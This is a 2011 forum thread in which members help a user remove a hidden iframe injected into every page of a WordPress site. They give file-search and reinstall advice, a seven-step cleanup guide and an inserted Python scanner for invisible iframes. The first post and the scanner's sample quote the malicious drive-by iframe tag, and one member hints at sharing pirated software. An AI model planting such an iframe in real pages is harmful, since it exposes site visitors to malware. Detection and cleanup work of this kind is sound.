
Little help please :)

Discussion in 'BlackHat Lounge' started by wowhaxor, Aug 18, 2011.

  1. wowhaxor

    wowhaxor Executive VIP Premium Member

    Joined:
    Apr 28, 2007
    Messages:
    2,021
    Likes Received:
    3,353
    Location:
    ?¿?
    Home Page:
    Hey,

    So I have a WP site that's infected with something but I can't figure out where. It's not in the theme, I don't think, because it is even there in my WP dashboard area. Checked htaccess and that's clean.

    It's this iframe right here:

    Code:
    <iframe frameborder=0 height=1 width=1 scrolling=no src='http://stormnouc.cx.cc/forum.php?tp=5d13ed839d54210e' > </iframe>
    
    It's on all my pages but I can't figure out how to get rid of it :(

    Help would be greatly appreciated!
     
  2. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 24, 2010
    Messages:
    3,104
    Likes Received:
    7,914
    Occupation:
    I don't have a job
    Location:
    .............
    Did you recently install some plugin?
    What theme are you using?
     
  3. wowhaxor

    wowhaxor Executive VIP Premium Member

    No recent plugins

    theme is "masterful"
     
  4. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    Alright, similar shit happened to me a few months back...

    Here's a tip to find out what's wrong:

    Download ALL files to your desktop with FileZilla or any FTP client.
    Open Notepad++ and press Ctrl+Shift+F or go to Search -> Find in Files.
    Select the folder you downloaded your site's files to.
    Search for: stormnouc.cx.cc

    More than likely, you will find where the problem is.

    I'd suggest you back up your site, uninstall WordPress and re-install it.
    Backup Buddy is awesome for backups. Hit me a PM if you want a working copy of backup buddy ;)

    Cheers.
     
  5. wowhaxor

    wowhaxor Executive VIP Premium Member

    OK,

    I was going to do that but am quite lazy so I was hoping someone knows where the malicious code is. Thanks and I'll give it a few hours to see if anyone else was infected with this, if not I'll do that :)
     
  6. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    The whole thing takes 5 minutes :)
     
  7. littleg2008

    littleg2008 Senior Member

    Joined:
    Dec 3, 2009
    Messages:
    861
    Likes Received:
    421
    Location:
    Cambridgeshire, UK
    Can you remove the theme and then reinstall it? Your content shall stay; it depends on whether you placed anything in a child theme.
     
  8. wowhaxor

    wowhaxor Executive VIP Premium Member

    As I said, quite lazy :)

    Ya, I can try that first.
     
  9. jamescraigmtts

    jamescraigmtts Newbie

    Joined:
    Jul 28, 2011
    Messages:
    24
    Likes Received:
    2
    Thanks and I'll give it a few hours to see if anyone else was infected with this..
     
  10. ericsson

    ericsson Elite Member Premium Member

    Joined:
    Apr 25, 2009
    Messages:
    2,642
    Likes Received:
    8,132
    Occupation:
    www
    Location:
    Swe
    Home Page:
    Code:
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fstormnouc.cx.cc%2Fforum.php&client=googlechrome&hl=en-US
     
  11. AutoBlogger

    AutoBlogger Power Member

    Joined:
    Oct 20, 2009
    Messages:
    780
    Likes Received:
    928
    Occupation:
    IM, AutoBlogging and Urban Planning
    Location:
    The Global Village
    It was infected from your local machine. It is called something ramnit.exe or something. Puts an iframe in all .php/.html/.aspx or other extensions' files.
    Do not extract your theme file on your PC. Upload it as a .zip and later extract it on your server.
    Faced the same situation a few months back. This might work.
     
  12. wowhaxor

    wowhaxor Executive VIP Premium Member

    That makes sense. I just got done cleaning up some viruses a couple of days ago!
     
  13. popzzz

    popzzz Supreme Member

    Joined:
    Apr 12, 2009
    Messages:
    1,337
    Likes Received:
    13,699
    Location:
    Don't touch the REP!

    7 Steps to remove Iframe virus

    Step 1

    First install this WordPress plugin, AntiVirus 0.4, then scan your templates, if you find any harmful code or virus indication.

    Now block access to your site by creating a temporary page index.htm and upload it to the server explaining that your site is down temporarily; this prevents infecting others' PCs. Also ask your hosting service to scan your server.

    Step 2

    Now start cleaning viruses on your PC: update your anti-virus or install branded or good working Internet security suites. As I said before, the origin of infection to your site will be your PC, which somehow got infected through other sites.

    Step 3
    After complete cleaning, now change all your FTP and cPanel passwords, or ask your site hosting staff to change them if you do not know how to change them.

    Step 4

    Now uninstall your FTP (desktop) software and all the registry entries with a nice uninstaller (I recommend Revo Uninstaller) and install new software (FileZilla recommended).

    Step 5
    Don't delete the files on the server. What you need to do is replace the infected files with original files.
    Sometimes your web host may help you restore instead of going through all this fixing, but maintaining the site is the responsibility of the customer.

    Step 6

    Now download the same WordPress version, themes (fresh copy) and plugins, scan them and check if there is iframe code in them with TextCrawler (freeware), then start replacing infected files with these files. Then remove unwanted themes and plugins.

    Reopen your web site and check if your antivirus prompts any alert about the site.

    Step 7

    The iframe virus or malware can infect any files (.php, .html, .asp) which have got a </body> tag. Below are some common files where we can find this code:
    index.php in root folder
    wp-config.php in root folder (be careful while replacing this file; it contains database information like user name and password)
    index.php in wp-admin folder
    index-extra.php in wp-admin folder
    index.php in wp-contents\yourtheme\ folder
    home.php in wp-contents\yourtheme\ folder
    default-filters.php in wp-includes folder

    Reference: http://www.techno360.in/7-steps-to-remove-iframe-virus-from-your-wordpress-blog/#ixzz1WURdcAyM
    Enjoy ..... :cool2:
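
The Find-in-Files search from post 4 and the file check from Step 7, as an added example that is not part of any post in this thread: a Python scanner that walks a downloaded copy of the site and reports iframes sized 0 or 1 pixel, plus any indicator string you pass in (for this thread, the domain quoted in the first post). The function names and the `injected.example` sample are constructed for illustration.

```python
import re
from pathlib import Path

# Extensions named in the thread (.php/.html/.asp/.aspx), plus .htm and .js.
SCAN_EXTS = {".php", ".html", ".htm", ".asp", ".aspx", ".js"}
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(
    r"""\b(width|height|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

def iframe_attrs(tag):
    """Width/height/src of one iframe tag (quoted or bare values)."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(tag)}

def is_tiny(value):
    """True for 0, 1, '0px', '1px': a frame the visitor cannot see."""
    m = re.fullmatch(r"(\d+)(?:px)?", (value or "").strip().lower())
    return bool(m) and int(m.group(1)) <= 1

def scan_text(text, indicators=()):
    """List (line, kind, detail) for invisible iframes and indicator strings."""
    findings = []
    for m in IFRAME_RE.finditer(text):  # tags may span several lines
        a = iframe_attrs(m.group(0))
        if is_tiny(a.get("width")) and is_tiny(a.get("height")):
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, "hidden-iframe", a.get("src", "")))
    for lineno, row in enumerate(text.splitlines(), 1):
        for ind in indicators:
            if ind.lower() in row.lower():
                findings.append((lineno, "indicator", ind))
    return sorted(findings)

def scan_tree(root, indicators=()):
    """Scan a downloaded copy of the site; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXTS:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_text(text, indicators)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample: a page with one injected tag just before </body>.
SAMPLE = ("<html><body>\n<p>Hello</p>\n<iframe frameborder=0 height=1 width=1 "
          "scrolling=no src='http://injected.example/forum.php?tp=0' > </iframe>\n"
          "</body></html>\n")
```

Run `scan_tree("path/to/downloaded/site", indicators=["<domain from the injected iframe>"])` against the local copy, then compare each reported file with a fresh copy of the same WordPress, theme or plugin version before replacing it.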


     
  14. quyen.hong

    quyen.hong Newbie

    Joined:
    Aug 29, 2011
    Messages:
    5
    Likes Received:
    0
    Occupation:
    It manager
    Location:
    www.vietnamtourpackages.com
    Home Page:
    Really! If you do it with Notepad++ you must do it one by one for each file, so tiring. You can use Dreamweaver, add a local site in Dreamweaver with the manage site tool, and find the code easily!

    Good luck
     
  15. bk071

    bk071 Jr. Executive VIP Jr. VIP Premium Member

    You can download the files to a folder then use 'Find in Files' feature of Notepad++.